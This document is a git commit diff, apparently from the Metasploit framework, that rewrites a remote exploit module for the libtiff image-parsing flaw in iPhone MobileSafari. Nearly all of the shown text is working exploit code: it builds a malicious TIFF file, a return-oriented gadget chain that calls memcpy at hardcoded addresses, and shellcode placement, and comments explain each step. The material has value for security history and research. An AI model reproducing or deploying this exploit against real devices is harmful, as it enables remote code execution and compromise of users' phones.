Total rewrite using a supah-sweet new return method.

git-svn-id: file:///home/svn/framework3/trunk@5148 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-10-16 05:29:13 +00:00
parent 3050615029
commit 49a54dfb6f
1 changed files with 83 additions and 70 deletions

View File

@ -41,7 +41,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
],
'Payload' =>
{
'Space' => 300,
'Space' => 3800,
'BadChars' => "",
# Multi-threaded applications are not allowed to execve() on OS X
@ -58,30 +58,16 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
},
'Targets' =>
[
[ 'MobileSafari iPhone Mac OS X Automatic',
{
'Platform' => 'osx',
'Arch' => ARCH_ARMLE,
'Automatic' => true
}
],
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)',
[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
{
'Platform' => 'osx',
'Arch' => ARCH_ARMLE,
'Stack' => 0x0055a5bc,
'Heap' => 0x0006b400,
'Memcpy' => 0x3009a1bc,
}
],
[ 'MobileSafari iPhone Mac OS X armle (1.1.1)',
{
'Platform' => 'osx',
'Arch' => ARCH_ARMLE,
'Stack' => 0x006f75bc,
'Heap' => 0x0006c400,
'Memcpy' => 0x3009a1bc,
# Scratch space for our shellcode and stack
'Heap' => 0x00802000,
# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
'Magic' => 0x300d562c,
}
],
],
@ -92,20 +78,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
def on_request_uri(cli, req)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Grab reference to the target
t = target
if(target['Automatic'])
t = self.targets[1]
case req.headers['User-Agent']
when /iPhone.*420\.1/
t = self.targets[2]
end
end
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
@ -116,49 +96,82 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
def generate_tiff(code, targ)
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
print_status("Opening file...")
data = File.read(path, File.size(path))
print_status("Done...")
#
# The basic idea:
#
# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
# This loads r0-r3 and pc from the stack, jumping to the address in pc
# The address in pc is the real address of memcpy(), which takes
# parameters via the r0-r3 registers. We memcpy the stack address
# (which seems to be static across all versions) to an unused page
# on the heap. Finally, we patch up a local variable (r6) and then
# return back to the heap location we copied the stack to.
# This is a TIFF file, we have a huge range of evasion
# capabilities, but for now, we don't use them.
# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
#
dst_ptr = targ['Heap']
src_ptr = targ['Stack']
shl_len = 168 + payload.encoded.length
# Still some wonky characters in here, this doesn't work with alpha/english/etc
patt = pattern_create(shl_len)
# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
patt[120,4] = [0x300df800].pack("V")
dlen = 0x1000
data =
"\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
"\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
"\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
"\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
"\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
"\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
"\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
"\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
[dlen].pack("V") +
"\x84\x00\x00\x00\x00\x00\x00\x00"
# memcpy(r0, r1, r2)
patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
patt[124,4] = [dst_ptr].pack("V") # dst
patt[128,4] = [src_ptr].pack("V") # src
patt[132,4] = [shl_len].pack("V") # len
# fix up r6 to bypass an exception
patt[112,4] = [dst_ptr + shl_len].pack("V")
# Randomize the bajeezus out of our data
patt = rand_text(dlen)
# Return back to our copied stack data
patt[164,4] = [dst_ptr + 168].pack("V")
# Were going to candy mountain!
patt[120, 4] = [target['Magic']].pack("V")
# Stick our shellcode into the buffer
patt[168, payload.encoded.length] = payload.encoded
# >> add r0, r4, #0x30
patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
# Candy mountain, Charlie!
# >> mov r1, sp
# It will be an adventure!
# >> mov r2, r8
patt[ 92, 4] = [ patt.length ].pack("V")
# Its a magic leoplurodon!
# It has spoken!
# It has shown us the way!
# >> bl _memcpy
# Its just over this bridge, Charlie!
# This magical bridge!
# >> ldr r3, [r4, #32]
# >> ldrt r3, [pc], r3, lsr #30
# >> str r3, [r4, #32]
# >> ldr r3, [r4, #36]
# >> ldrt r3, [pc], r3, lsr #30
# >> str r3, [r4, #36]
# >> ldr r3, [r4, #40]
# >> ldrt r3, [pc], r3, lsr #30
# >> str r3, [r4, #40]
# >> ldr r3, [r4, #44]
# >> ldrt r3, [pc], r3, lsr #30
# >> str r3, [r4, #44]
# We made it to candy mountain!
# Go inside Charlie!
# sub sp, r7, #0x14
patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
# Goodbye Charlie!
# ;; targ['Heap'] + 0x48 becomes the stack pointer
# >> ldmia sp!, {r8, r10}
# Hey, what the...!
# >> ldmia sp!, {r4, r5, r6, r7, pc}
# Return back to the copied heap data
patt[192, 4] = [ targ['Heap'] + 196 ].pack("V")
# Insert our actual shellcode at heap location + 196
patt[196, payload.encoded.length] = payload.encoded
data << patt
data